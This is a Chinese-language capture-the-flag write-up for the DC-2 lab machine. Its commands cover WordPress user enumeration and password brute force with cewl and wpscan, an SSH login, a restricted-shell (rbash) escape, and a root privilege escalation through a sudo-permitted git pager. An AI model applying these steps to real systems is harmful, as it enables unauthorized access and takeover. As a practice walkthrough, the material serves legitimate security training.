Dc2

使用nmap扫描靶机，发现靶机开放了80端口和7744端口，7744端口是ssh远程端口。

访问80端口，发现是一个wordpress，查看flag1，要我们用cewl命令获取密码字典

在kali使用命令cewl http://dc-2/ -w passwd.txt

Cewl http://dc-2 -w passwd.txt

然后使用wpscan工具扫描靶机，尝试把用户名破解出来

Wpscan –url http://dc-2 -e u

成功将用户名破解出来，分别为 admin、jerry、tom

将这三个用户名放置在user.txt文档中，使用wpscan跑密码

Wpscan –url http://dc-2 -U user.txt -P passwd.txt

跑出来两个用户的密码

用过wordpress或者打过wordpress应该都知道，登录管理员的网址就是在后面添加wp-admin

找到flag2，提示我们如果不能利用wordpress找到flag，还有另一种方法

记得我们在使用nmap扫描靶机的时候，，发现靶机开放了80端口和ssh服务，我也跑出来的两个用户名，尝试

使用另一个用户登录ssh服务

Ssh tom@ip -p 7744

成功登录进入

查找flag3，内容为：可怜的老汤姆总是追着杰瑞跑，也许他应该为自己造成的压力负责。可能是提示我们，需要使用

Jerry用户登录

想要切换Jerry用户，发现被rbash限制了行为

使用echo绕过rbash限制

BASH_CMDS[a]=/bin/sh;a

Export PATH=$PATH:/bin/

Export PATH=$PATH:/usr/bin

这样就设置好了，然后切换jerry用户

登录成功，sudo -l查看jerry用户有什么权限

拥有git的管理员权限，执行管理员权限时不需要密码

使用sudo git -p help config命令提权

在输入!/bin/sh

成功获取root权限

最终的flag找到了